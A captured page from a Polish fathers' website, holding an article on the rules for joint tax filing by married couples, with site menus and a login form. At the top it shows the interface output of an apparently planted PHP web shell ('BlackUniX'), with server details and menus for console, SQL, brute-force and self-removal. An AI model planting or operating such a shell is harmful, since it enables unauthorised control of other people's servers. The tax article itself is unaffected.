W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-20 11:09:11
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.198.158.24
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Musimy się rozliczyć...
09.04.2008.

Podstawowym warunkiem korzystania z przywileju wspólnego rozliczania się małżonków jest istnienie małżeństwa przez pełny okres roku podatkowego. Inaczej mówiąc, nie mogą rozliczać się wspólnie młode małżeństwa, które usankcjonowały swój związek w trakcie trwania roku podatkowego. Nie mogą również korzystać z niego osoby, które rozwiodły się w trakcie roku – tu liczy się moment prawomocnego wyroku. Separacja również wyklucza wspólne rozliczanie się.

Pary, chcące rozliczać się wspólnie, muszą złożyć PIT do 30 kwietnia. Spóźnienie się ze złożeniem PITa powoduje utratę tej możliwości. Oboje małżonkowie muszą mieszkać w Polsce i mieć wspólność majątkową.

UWAGA: Częstym problemem jest brak podpisu obojga małżonków na formularzu. W takich sytuacjach urząd skarbowy nie wzywa podatników do złożenia podpisu, tylko do złożenia odrębnych PIT-ów. Prościej mówiąc przez brak podpisu można stracić prawo do wspólnego opodatkowania.

Rozliczanie się za pomocą ryczałtu ewidencjonowanego lub karty podatkowej, któregokolwiek z małżonków wyklucza wspólne opodatkowanie.

Także zryczałtowany podatek dochodowy od przychodów osób duchownych eliminuje możliwość wspólnych rozliczeń.

Formalnie śmierć współmałżonka likwiduje możliwość wspólnego opodatkowania. Istnieją jednak dwa wyjątki, kiedy wspólne rozliczenie jest możliwe:

-podatnik zawarł związek małżeński przed rozpoczęciem roku podatkowego, a jego małżonek zmarł w trakcie roku podatkowego,
-podatnik pozostawał w związku małżeńskim przez cały rok podatkowy, a jego małżonek zmarł po upływie roku podatkowego przed złożeniem zeznania podatkowego.

Jeśli w wyniku śmierci małżonka podatnik staje się osobą samotnie wychowującą dziecko, uzyskuje przywilej wspólnego rozliczania się z dzieckiem.

Jednak rozliczanie się podatnika wspólnie z dzieckiem wyklucza wspólne rozliczenie z nieżyjącym małżonkiem. Trzeba więc wyliczyć, która z opcji będzie korzystniejsza.


Na szczęście małżonkowie nie muszą w żaden sposób zgaszać chęci wspólnego rozliczenia się, nawet jeśli do tej pory nie rozliczali się w taki sposób.

 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


20.06.2018.